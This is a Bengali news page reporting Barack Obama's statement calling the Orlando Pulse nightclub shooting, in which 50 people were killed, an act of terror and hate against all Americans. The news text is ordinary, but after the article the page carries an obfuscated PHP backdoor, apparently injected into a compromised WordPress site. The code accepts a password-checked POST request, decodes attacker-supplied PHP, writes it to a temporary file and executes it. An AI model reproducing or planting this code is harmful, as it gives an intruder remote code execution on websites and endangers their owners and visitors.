মঙ্গলবার, ১৮ই জুন, ২০২৪ খ্রিস্টাব্দ ৪ঠা আষাঢ়, ১৪৩১ বঙ্গাব্দ

এটা সব আমেরিকানের ওপর হামলা: ওবামা

 
আন্তর্জাতিক ডেস্ক : যুক্তরাষ্ট্রের প্রেসিডেন্ট বারাক ওবামা বলেছেন, ফ্লোরিডা অঙ্গরাজ্যের অরলান্ডোর সমকামীদের নাইট ক্লাবে গুলি চালিয়ে ৫০ জনকে হত্যার মাধ্যমে সব আমেরিকানের ওপর হামলা চালানো হয়েছে। তিনি এ হামলাকে ‘সন্ত্রাসী কর্মকা-’ ও ‘বিদ্বেষপ্রসূত কাজ’ বলে আখ্যা দিয়েছে।প্রেসিডেন্টের দপ্তর হোয়াইট হাউসে দেওয়া এক বিবৃতিতে ওবামা এসব কথা বলেন।

image_21231

 

স্থানীয় সময় শনিবার দিবাগত রাত দুইটার দিকে অরলান্ডোর পালস নামে সমকামীদের নাইটক্লাবে হামলা চালান ওমর মতিন নামের এক যুবক। এ হামলায় ৫০ জন নিহত হন। আহত হন কমপক্ষে ৫৩ জন।হামলার পর পুলিশের সঙ্গে গুলি বিনিময়ে নিহত হন মতিন।জঙ্গি সংগঠন ইসলামিক স্টেটের (আইএস) দাবি, হামলাকারী মতিন তাদের সংগঠনের যোদ্ধা। যদিও যুক্তরাষ্ট্রের কেন্দ্রীয় তদন্ত ব্যুরো (এফবিআই) কিংবা আইনশৃঙ্খলা বাহিনীর পক্ষ থেকে এ বিষয়ে এখন পর্যন্ত সুস্পষ্ট কোনো বক্তব্য পাওয়া যায়নি।

 

 

ওই হামলার প্রতিক্রিয়ায় ওবামা বলেন, ‘আজ আমেরিকান হিসেবে আমরা এই বর্বরোচিত হত্যা, নিরীহ লোকজনের ওপর ভয়ানক হত্যাযজ্ঞের নিন্দা জানাই।’‘যদিও এখন পর্যন্ত তদন্তকাজ প্রাথমিক অবস্থায় আছে, এরপরও আমরা বলতে পারি, এটা সন্ত্রাসী কর্মকা- এবং বিদ্বেষপ্রসূত কাজ।’ওবামা বলেন, ‘আমরা ভয়ের কাছে নতি স্বীকার করব না কিংবা একে অন্যের বিরুদ্ধে দাঁড়াব না। এর পরিবর্তে আমরা আমাদের লোকজনকে রক্ষা ও আমাদের জাতীয়তাকে আগলে ধরে আমেরিকান হিসেবে ঐক্যবদ্ধ থাকব। একই সঙ্গে যারা আমাদের হুমকি দেবে, তাদের বিরুদ্ধে ব্যবস্থা নেব।’হামলায় নিহত ব্যক্তিদের স্মরণে হোয়াইট হাউসে জাতীয় পতাকা অর্ধনমিত রাখার নির্দেশ দিয়েছেন ওবামা।

এ জাতীয় আরও খবর

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}